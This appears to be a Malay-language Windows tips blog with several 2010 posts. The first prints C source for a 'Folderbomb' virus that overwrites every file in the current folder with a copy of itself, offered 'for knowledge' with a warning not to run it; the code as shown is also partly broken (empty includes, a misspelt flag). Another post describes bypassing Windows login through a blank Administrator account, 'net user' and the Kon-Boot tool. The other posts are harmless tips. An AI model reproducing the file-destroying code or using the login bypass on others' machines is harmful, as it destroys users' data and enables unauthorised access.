09 October 2010

Kod Aturcara Virus

Artikel saya pada kali ini bukan berkenaan dengan Windows, tetapi berkenaan dengan virus yang menyerang sistem operasi Windows. Semua sudah maklum tentang virus komputer ini. Sebut aje ada virus, semua sudah sinonim mendengarnya. Tapi adakah anda tahu apa itu virus yang sebenarnya dan macam mana program virus itu di buat?


Disini saya dedahkan satu aturcara atau program virus yang mana virus program ini akan membuat folder dalam folder dan seterusnya. Jangan bimbang, kod virus ini TIDAK AKAN sama sekali memasuki komputer anda selagi ianya tidak ditukarkan kepada fail yang boleh di run (executable), selagi itulah ianya tidak akan membahayakan komputer anda. Artikel ini bertujuan untuk pengetahuan dan berkongsi ilmu. Aturcara ini di buat dengan menggunakan bahasa pengaturcaraan C atau C++ . Kebanyakkannya, hampir kesemua virus komputer yang ada sehingga kini direka dengan aturcara ini. Ini kerana banyak fungsi-fungsi yang sudah tersedia dalam aturcara ini memudahkan pengaturcara (programmer) merekabentuk virus yang mereka kehendaki. Kaedah pembikinan virus ini ada yang kadangkala itu cukup mudah dan ada juga yang terlalu rumit. Ini bergantung kepada tujuan pembikinan kod virus tersebut. Dan tidak ketinggalan juga ada sesetengah antivirus itu dibuat dengan menggunakan aturcara ini. Jadi kepada anda yang belum tahu apa itu virus komputer, macam mana rupanya virus komputer, lihatlah contoh kod virus ini..dan kepada sesiapa yang faham dan mengerti kod aturcara di bawah, JANGAN sesekali anda run kod ini..


/*Contoh kod virus Folderbomb yang di reka dengan bahasa pengaturcaraan C*/

#include
#include
#include
#include
#include

void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(“————————————————————————–”);
printf(“\nVirus: Folderbomb 1.0\n”);
cprintf(“————————————————————————–”);
done = findfirst(“*.*”,&ffblk,0);
while (!done)
{ printf(“\n”);cprintf(” %s “, ffblk.ff_name);printf(“is attacked by “);cprintf(“Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}


"Selamat Mencuba & Pastikan Anda Tahu Apa Yang Anda Lakukan"




Baca lagi...



08 October 2010

Teknik Uninstall IE8 Dalam Windows 7

Tentu anda tidak percaya betapa mudah dan senangnya untuk membuang aplikasi Internet Explorer 8 dalam Windows 7, begitu juga pada era Windows 95/98. Jika anda bukan peminat browser IE, inilah masanya untuk anda membuang terus dari komputer anda.


Tapi perlu di ingat, pelayar IE ini didatangkan dengan sistem operasi Windows, secara tidak langsung ada fail-fail sistem yang saling berhubungkait antara satu sama lain. Walaubagaimanapun, terpulang pada anda untuk membuangnya atau tidak. Ikuti langkah-langkah berikut;


1. Klik Start dan taipkan arahan berikut (tanpa quote), "optionalfeatures.exe" dan
tekan kekunci Enter. Satu tetingkap baru "Windows Features" akan di paparkan.

2. Pada panel sebelah kiri tetingkap "Windows Features" tersebut, klik pada
"Turns Windows features on or off”.

3. Kemudian, cari item "Internet Explorer 8" dan buang/uncheck item tersebut untuk
tidak mengaktifkannya.

4. Restart komputer anda dan sekarang aplikasi IE8 telah hilang atau tiada dalam
sistem Windows.


"Selamat Mencuba & Pastikan Anda Tahu Apa Yang Anda Lakukan"




Baca lagi...



07 October 2010

Baikpulih Fail CHM Win 7 Dalam Masa 3 Saat

Fail CHM atau (Microsoft Compiled HTML Help) adalah fail-fail bantuan Windows. Sebelum format fail CHM ini digunakan, fail berformat WinHelp digunakan dalam setiap versi Windows. Kini pihak Microsoft telah pun menaiktaraf fail-fail bantuan ini ke format yang lebih fleksibel dan mudah digunakan. Format ini juga digunakan untuk merekabentuk fail-fail e-book yang digunakan untuk tujuan penjualan buku-buku elektronik.


Tahukah anda bahawa fail-fail CHM ini juga ada kalanya tidak dapat dipaparkan dengan baik dalam sistem operasi Windows 7. Mesej seperti “Navigation to the webpage was canceled” akan keluar di skrin. Teknik untuk membaikpulih fail CHM ini ialah;

1. Klik butang kanan tetikus pada fail CHM yang bermasalah itu dan pilih Properties

2. Pada tab General, klik pada butang Unblock

3. Klik OK dan buka kembali fail CHM tersebut. Sepatutnya kandungan dalam fail CHM
itu akan dipaparkan dengan baik


"Selamat Mencuba & Pastikan Anda Tahu Apa Yang Anda Lakukan"



Baca lagi...



06 October 2010

Teknik Reset Password Windows 7

Ciri-ciri keselamatan dalam Windows 7 telah dinaiktaraf berbanding dengan Windows Vista sebelum ini. Walaupun begitu masih lagi terdapat beberapa teknik untuk memecah masuk ke dalam sistem operasi Windows 7. Sebagai contoh, seringkali juga kita terlupa katalaluan (password) untuk login ke dalam operasi sistem ini. Namun di sini saya dedahkan beberapa teknik yang boleh dicuba untuk reset kembali katalaluan yang terlupa tadi.


Metod 1 - Login sebagai pentadbir sistem atau "Administrator Account"

1. Hidupkan sistem operasi Windows 7 dalam komputer anda.

2. Bila skrin "Windows Login" di paparkan, tekan kekunci Ctrl+Alt+Del sebanyak 2
kali dan tunggu sehingga sistem memaparkan skrin login versi terdahulu.

3. Taipkan nama pengguna sebagai Administrator dan jangan masukkan katalaluan,
biar kosong begitu sahaja.

4. Kemudian tekan kekunci Enter dan secara automatik sistem akan log masuk
sebagai akaun Administrator yang mana tidak mempunyai katalaluan semasa
proses instalasi Windows dahulu.

Nota : semasa proses kombinasi kekunci Ctrl+Alt+Del, pastikan anda tidak klik pada
mana-mana akaun yang wujud dalam skrin login berkenaan. Ini kerana, jika
berlaku demikian, cara atau teknik sebegini tidak akan berkesan andainya
anda telah menukar nama pengguna dan katalauan sebelum ini.

Metod 2 - Guna arahan dalam persekitaran "Command Prompt"

1. Login ke dalam sistem dengan menggunakan mana-mana akaun.

2. Buka atau aktifkan aplikasi Command Prompt (andaian anda telah tahu di mana atau
macam mana hendak mengaktifkan aplikasi Command Prompt).

3. Taipkan 'net user' (tanpa quote). Sistem akan memaparkan senarai pengguna
di dalam sistem Windows ini.

4. Kemudian taipkan 'net user Administrator' (tanpa quote). Sistem akan memaparkan
senarai pengguna yang mempunyai status akaun Administrator.

5. Taipkan lagi 'net user ' (tanpa quote).

6. Sistem akan meminta untuk dimasukkan katalaluan atau password untuk pengguna
berkenaan. Masukkan katalaluan pilihan dan masukkan sekali lagi jika di minta
berbuat demikian.

7. Akhir sekali, cuba anda login kedalam sistem dengan menggunakan akaun
Administrator dan masukkan katalaluan baru yang telah dibuat.

Nota : teknik ini tidak akan berkesan jika akaun pengguna adalah terhad atau limited

Metod 3 - Menggunakan CD Windows Password Recovery

1. Muat turun aplikasi ini

2. Setelah selesai, burnkan image berkenaan pada CD/DVD atau pada pemacu USB.

3. Masukkan CD/DVD atau USB pada pemacu masing-masing dan reboot komputer anda.

4. Sebelum sistem komputer anda boleh reboot menggunakan CD/DVD atau USB,
pastikan setting di bios komputer anda telah ditetapkan aturannya.

5. Reboot sekali lagi komputer anda.

6. Bila sistem komputer telah selesai loading, tentukan folder instalasi Windows
dan pilih nama pengguna untuk di reset kembali katalaluannya.

7. Setelah selesai, reboot sekali lagi komputer anda dan sebelum itu jangan
lupa keluarkan CD/DVD atau USB pada pemacu masing-masing.

8. Akhir sekali, login masuk ke dalam sistem Windows tanpa memasukkan katalaluan.

Metod 4 - Menggunakan aplikasi sokongan KON BOOT

Aplikasi KON BOOT ini bukan sahaja dapat digunakan pada platform Windows, tapi ia juga dapat digunakan pada sistem operasi yang berteraskan Linux. Aplikasi ini mampu untuk mengubah kernel pada Windows dan Linux. Secara tidak langsung ia juga mampu untuk mengubah atau reset katalaluan jika anda terlupa. Untuk versi Windows, aplikasi KON BOOT ini telah di uji dan di dapati berkesan pada versi-versi Windows di bawah;

* Windows Server 2008 Standard SP2 (v.275)
* Windows Vista Business SP0
* Windows Vista Ultimate SP1
* Windows Vista Ultimate SP0
* Windows Server 2003 Enterprise
* Windows XP
* Windows XP SP1
* Windows XP SP2
* Windows XP SP3
* Windows 7

Manakala untuk versi Linux pula, di bawah ini disenaraikan distributor yang telah di uji dengan KON BOOT dan di dapati berkesan ialah;

* Gentoo 2.6.24-gentoo-r5 GRUB 0.97
* Ubuntu 2.6.24.3-debug GRUB 0.97
* Debian 2.6.18-6-6861 GRUB 0.97
* Fedora 2.6.25.9-76.fc9.i6862 GRUB 0.97


1. Muat turun aplikasi berkenaan di ruangan Software Tools.

2. Setelah selesai di muat turun, burnkan image berkenaan pada CD/DVD atau USB

3. Reboot komputer anda dengan menggunakan salah satu dari pemacu ini.

4. Ikut arahan yang di berikan sehingga selesai.

Untuk memudahkan lagi pemahaman dan cara instalasi KON BOOT ini, anda boleh klip video KON BOOT di sini.


"Selamat Mencuba & Pastikan Anda Tahu Apa Yang Anda Lakukan"

Download artikel ini



Baca lagi...



05 October 2010

Senarai Penuh Arahan-Arahan Windows Vista

Dibawah ini adalah senarai penuh arahan-arahan yang boleh digunakan dalam Windows Vista, juga dikenali sebagai 'shell'. Untuk itu apa yang perlu anda lakukan ialah klik pada Start-> Search Box atau Start-> Run..taipkan arahan-arahan berikut ke dalam kotak yang telah disediakan;


AddNewProgramsFolder
Administrative Tools
AppData
AppUpdatesFolder
Cache
CD Burning
ChangeRemoveProgramsFolder
Common Administrative Tools
Common AppData
Common Desktop
Common Documents
Common Programs
Common Start Menu
Common Startup
Common Templates
CommonDownloads
CommonMusic
CommonPictures
CommonVideo
ConflictFolder
ConnectionsFolder
Contacts
ControlPanelFolder
Cookies
Cookies’Low
CredentialManager
CryptoKeys
CSCFolder
default Gadgets
desktop
downloads
dpapiKeys
Favorites
Fonts
Gadgets
Games
GameTasks
History
InternetFolder
Links
Local AppData
LocalAppDataLow
LocalizedResourcesDir
MAPIFolder
My Music
My Pictures
My Video
MyComputerFolder
NetHood
NetworkPlacesFolder
OEM Linkslocation.
Original Images
Personal
PhotoAlbums
Playlists
PrintersFolder
PrintHood
Profile
ProgramFiles
ProgramFilesCommon
ProgramFilesCommonX86
ProgramFilesX86
Programs
Public
PublicGameTasks
Quick Launch
Recent
RecycleBinFolder
ResourceDir
SampleMusic
SamplePictures
SamplePlaylists
SampleVideos
SavedGames
Searches
SendTo
Start Menu
Startup
SyncCenterFolder
SyncResultsFolder
SyncSetupFolder
System
SystemCertificates
SystemX86
Templates
TreePropertiesFolder
UserProfiles
UsersFilesFolder
Windows


"Selamat Mencuba & Pastikan Anda Tahu Apa Yang Anda Lakukan"



Baca lagi...



04 October 2010

Papar Super Hidden Files Dalam Windows Vista

Semua versi Windows mempunyai fail-fail sistem yang penting untuk membolehkan aplikasi Windows berjalan dengan baik dan lancar. Kebanyakkan fail-fail ini tidak boleh di capai atau di gunakan oleh pengguna atas alasan dan tujuan keselamatan sistem Windows. Ini kerana jika salah satu fail dari sistem Windows telah di ubah atau di buang (delete), berkemungkinan besar aplikasi Windows tidak dapat beroperasi dengan baik.

Tetapi pada sesetengah masalah Windows, fail-fail ini sangat penting untuk dicapai dan digunakan untuk tujuan membaikpulih sistem Windows. Tidak terkecuali dalam Windows versi Vista ini. Kesemua fail-fail sistem dalam Windows Vista dikenali sebagai "Super Hidden Files". Fail-fail ini secara amnya tidak dipaparkan pada pengguna. Untuk tujuan pembelajaran dan baikpulih, ikuti langkah-langkah berikut untuk membolehkan kesemua fail-fail sistem ini dapat dicapai dan digunakan.


1. Klik Start-> Search Box

2. Pada ruangan Search Box, taipkan (tanpa quote) 'regedit' dan tekan kekunci Enter

3. Klik Continue untuk membolehkan pengguna melepasi 'User Account Control'

4. Pada sebelah kiri panel, cari kekunci berikut;

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

5. Pada sebelah kanan panel, klik 2x pada SuperHidden

6. Tukar nilai kepada 1

7. Klik OK, dan restart komputer anda


Kini, anda boleh lihat kesemua fail-fail sistem yang disembunyikan dari anda..


"Selamat Mencuba & Pastikan Anda Tahu Apa Yang Anda Lakukan"



Baca lagi...



03 October 2010

Kehebatan Ikon Maya Dalam WinXP

Boleh dikatakan setiap versi Windows mempunyai fasiliti untuk menyorokkan (hidden) folder/fail tertentu dengan cara menukar jenis atribut folder/fail berkenaan. Tapi pada masa yang sama, sekiranya pengguna lain menggunakan komputer anda, mereka masih boleh mengakses folder tersebut. Teknik yang akan diterangkan disini nanti agak sukar juga untuk dikesan oleh sesiapa dimana kedudukan folder/fail berkenaan. Oleh itu anda digalakkan untuk mengingat atau menulis lokasi folder yang akan disorokkan itu nanti untuk tujuan keselamatan andainya anda terlupa dimana kedudukannya.


Ikuti cara-cara berikut;

1. Klik butang kanan mana-mana folder/fail yang anda ingin menyorokkannya dan pilih
menu 'Properties'

2. Klik tab 'Customize'

3. Klik pada butang 'Change Icon...'

4. Satu kekotak himpunan ikon-ikon akan dipaparkan. Sekiranya kekotak ikon ini tidak
keluar, anda perlu mencari folder Windows-> System32 dan cari fail 'Shell32.dll'
dan kemudian tekan butang 'Open'.

5. Cuba anda skrol ke kanan dan cari ikon yang tiada bergambar (blank icon), dan
kemudian klik OK.

6. Kemudian klik 'Apply'. Sekarang anda mempunyai satu folder/fail yang tiada
bergambar dan hanya mempunyai text nama dibawahnya.


"Selamat Mencuba & Pastikan anda Tahu Apa Yang Anda Lakukan"



Baca lagi...



02 October 2010

Kembalikan Menu Run Dalam Windows Vista

Jika anda adalah pengguna Windows versi Vista, anda akan dapati menu "Run" tidak kelihatan pada menu utama seperti mana Windows versi XP. Ini kerana pihak Microsoft telah mengambil langkah untuk tidak memaparkan menu ini pada tetapan asal (default setting) semasa proses instalasi Windows Vista.


Tapi jika anda pengguna Windows Vista dan ingin mengembalikan semula menu "Run" ini, anda masih boleh berbuat demikian. Apa yang perlu anda lakukan ialah;

1. Klik butang kanan pada 'Taskbar' dan pilih menu 'Properties'.

2. Klik pada tab 'Start Menu' dan kemudian klik 'Customize Button'.

3. Satu kekotak dialog akan dipaparkan. Skrol kebawah dan cari item 'Run Command'.
Tandakan (check mark) item ini.

4. Akhir sekali, klik 'Apply' dan sekarang cuba anda klik Start menu.


"Selamat Mencuba & Pastikan Anda Tahu Apa Yang Anda Lakukan"




Baca lagi...



01 October 2010

4 Aplikasi Terbaik WinXP Yang Jarang Diketahui

Pelbagai aplikasi dipasangkan atau di instal semasa proses instalasi WinXP. Tetapi terdapat beberapa aplikasi yang jarang diketahui oleh pengguna, ini kerana tiada ikon pintasan (shortcut) dibuat di menu utama. 4 aplikasi yang akan didedahkan disini mungkin boleh membantu pengguna di dalam pengurusan sistem Windows.


Apa yang perlu anda lakukan ialah klik pada Start-> Run dan taipkan arahan berikut (tanpa quote di atas);

1. 'eudcedit'
Private Character Editor - digunakan untuk tujuan mengedit fon

2. 'drwtsn32
Dr Watson - ini adalah aplikasi yang sedia terpasang dalam Windows untuk tujuan
membaikpulih aplikasi yang mempunyai masalah

3. 'mplay32'
Media Player 5.1 - ini adalah aplikasi video multimedia versi lama. Sebagai
alternatif sekiranya versi yang baru rosak atau tidak dapat berfungsi.

4. 'iexpress'
Aplikasi untuk mencipta installer atau setup program. Jarang di ketahui oleh
pengguna.


"Selamat Mencuba & Pastikan Anda Tahu Apa Yang Anda Lakukan"


Baca lagi...